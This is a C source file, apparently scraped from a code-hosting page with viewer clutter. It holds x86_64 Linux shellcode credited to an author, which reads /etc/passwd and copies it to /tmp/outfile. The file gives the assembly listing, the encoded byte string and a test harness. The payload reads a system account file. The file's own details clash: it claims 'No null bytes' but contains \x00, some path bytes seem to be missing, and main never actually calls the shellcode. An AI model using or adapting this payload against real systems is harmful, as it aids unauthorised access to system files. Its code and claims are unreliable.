62 lines
No EOL
1.7 KiB
C
62 lines
No EOL
1.7 KiB
C
/*
|
|
Reads data from /etc/passwd to /tmp/outfile
|
|
No null bytes
|
|
|
|
Author: Chris Higgins <chris@chigs.me>
|
|
@ch1gg1ns -- github.com/chiggins -- http://chigstuff.com/blog/2014/03/29/my-first-shellcode/
|
|
chigstuff.com
|
|
Date: 3-27-2014
|
|
Size: 118 bytes
|
|
Tested: ArchLinux x86_64 3.13.6-1
|
|
Assembly:
|
|
xor rax, rax
|
|
mov al, 2
|
|
xor rdi, rdi
|
|
mov rbx, 0x647773
|
|
push rbx
|
|
mov rbx, 0x7361702f6374652f
|
|
push rbx
|
|
lea rdi, [rsp]
|
|
xor rsi, rsi
|
|
syscall
|
|
mov rbx, rax
|
|
xor rax, rax
|
|
mov rdi, rbx
|
|
mov rsi, rsp
|
|
mov dx, 0xFFFF
|
|
syscall
|
|
mov r8, rax
|
|
mov rax, rsp
|
|
xor rbx, rbx
|
|
push rbx
|
|
mov rbx, 0x656c6966
|
|
push rbx
|
|
mov rbx, 0x74756f2f706d742f
|
|
push rbx
|
|
mov rbx, rax
|
|
xor rax, rax
|
|
mov al, 2
|
|
lea rdi, [rsp]
|
|
xor rsi, rsi
|
|
push 0x66
|
|
pop si
|
|
syscall
|
|
mov rdi, rax
|
|
xor rax, rax
|
|
mov al, 1
|
|
lea rsi, [rbx]
|
|
xor rdx, rdx
|
|
mov rdx, r8
|
|
syscall
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
|
|
char shellcode[] = "\x48\x31\xc0\xb0\x02\x48\x31\xff\xbb\x73\x77\x64\x00\x53\x48\xbb\x2f\x65\x74\x63\x70\x61\x73\x53\x48\x8d\x3c\x24\x48\x31\xf6\x0f\x05\x48\x89\xc3\x48\x31\xc0\x48\x89\xdf\x48\x89\xe6\x66\xba\xff\xff\x0f\x05\x49\x89\xc0\x48\x89\xe0\x48\x31\xdb\x53\xbb\x66\x69\x6c\x65\x53\x48\xbb\x2f\x74\x6d\x70\x6f\x75\x74\x53\x48\x89\xc3\x48\x31\xc0\xb0\x02\x48\x8d\x3c\x24\x48\x31\xf6\x6a\x66\x66\x5e\x0f\x05\x48\x89\xc7\x48\x31\xc0\xb0\x01\x48\x8d\x33\x48\x31\xd2\x4c\x89\xc2\x0f\x05";
|
|
|
|
int main() {
|
|
printf("len: %d bytes", sizeof shellcode);
|
|
(*(void (*)()) shellcode);
|
|
return 0;
|
|
} |